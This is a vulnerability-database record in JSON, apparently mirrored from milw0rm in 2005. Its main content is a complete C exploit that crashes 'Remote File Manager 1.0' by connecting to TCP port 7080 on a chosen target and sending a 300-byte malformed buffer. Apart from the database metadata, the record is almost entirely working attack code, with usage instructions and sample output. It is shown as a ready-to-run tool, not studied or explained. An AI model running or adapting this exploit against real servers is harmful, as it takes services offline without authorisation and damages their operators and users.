{"href": "https://www.seebug.org/vuldb/ssvid-15560", "status": "poc", "bulletinFamily": "exploit", "modified": "2005-05-08T00:00:00", "title": "Remote File Manager 1.0 Denial of Service Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-15560", "cvelist": [], "description": "No description provided by source.", "viewCount": 9, "published": "2005-05-08T00:00:00", "sourceData": "\n /*\r\n\r\n Server Remote File Manager DoS Exploit\r\n-------------------------------------------\r\n INFGP - Hacking&security Research\r\n\r\n[+] Attacking localhost..\r\n[+] Build DOS string\r\n[+] Buffer size = 300 byte\r\n[+] Sending bad format..\r\n[+] localhost : Disconected!\r\n\r\nGreats: Infam0us Gr0up,Zone-H,securiteam,str0ke-milw0rm,addict3d,\r\nThomas-secunia,Yudha,c0d3r,Kavling Community,1st Indonesian Security,\r\nJasakom,ECHO,etc..betst reagrds t0 whell.\r\nInfo: 98.to/infamous\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <winsock2.h>\r\n#pragma comment(lib, "ws2_32.lib")\r\n#define size 300\r\n\r\nint main (int argc, char *argv[]){\r\n\r\nchar req[] =\r\n"M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\\?X.JIY.HS&"\r\n"<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\\?"\r\n"X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYN"\r\n"KG&MKL\\?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-"\r\n"qv#trog.ro#mkodph>qv#trog.ro#mkodph\\n";\r\n\r\n unsigned int rc,addr,inetsock ;\r\n struct sockaddr_in tcp;\r\n struct hostent * hp;\r\n WSADATA wsaData;\r\n char buffer[size];\r\n\r\n memset(buffer,'A',300);\r\n memcpy(buffer,req,25);\r\n\r\n if(argc < 2) {\r\n printf("\\n\\n Server Remote File Manager DoS Exploit \\n", argv[0]);\r\n printf(" -----------------------------------------\\n", argv[0]);\r\n printf(" INFGP - Hacking&Security Research\\n\\n", argv[0]);\r\n printf("[-]Usage: %s [target]\\n", argv[0]);\r\n printf("[?]Exam: %s localhost \\n", argv[0]);\r\n exit(-1) ;\r\n }\r\n\r\n if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){\r\n printf("WSAStartup failed !\\n");\r\n exit(-1);\r\n }\r\n hp = gethostbyname(argv[1]);\r\n if (!hp){\r\n addr = inet_addr(argv[1]);\r\n }\r\n if ((!hp) && (addr == INADDR_NONE) ){\r\n printf("Unable to resolve %s\\n",argv[1]);\r\n exit(-1);\r\n }\r\n inetsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\r\n if (!inetsock){\r\n printf("socket() error...\\n");\r\n exit(-1);\r\n }\r\n if (hp != NULL)\r\n memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);\r\n else\r\n tcp.sin_addr.s_addr = addr;\r\n\r\n if (hp)\r\n tcp.sin_family = hp->h_addrtype;\r\n else\r\n tcp.sin_family = AF_INET;\r\n\r\n tcp.sin_port=htons(7080);\r\n\r\n printf("\\n[+] Attacking %s..\\n" , argv[1]) ;\r\n printf("[+] Build DOS string\\n");\r\n Sleep(1000);\r\n printf("[+] Buffer size = %d byte\\n" , sizeof(buffer));\r\n rc=connect(inetsock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));\r\n if(rc==0)\r\n {\r\n\r\n Sleep(1000) ;\r\n printf("[+] Sending bad format..\\n") ;\r\n send(inetsock , buffer , sizeof(buffer) , 0);\r\n printf("[+] %s : Disconected! \\n\\n" , argv[1]) ;\r\n}\r\n else {\r\n printf("[-] Port :7080 is invalid.Server not connected!\\n");\r\n}\r\n}\n\n// milw0rm.com [2005-05-08]\n\n ", "id": "SSV:15560", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:34:51", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-11-19T22:34:51", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T22:34:51", "rev": 2}, "vulnersScore": -0.1}, "references": []}

{}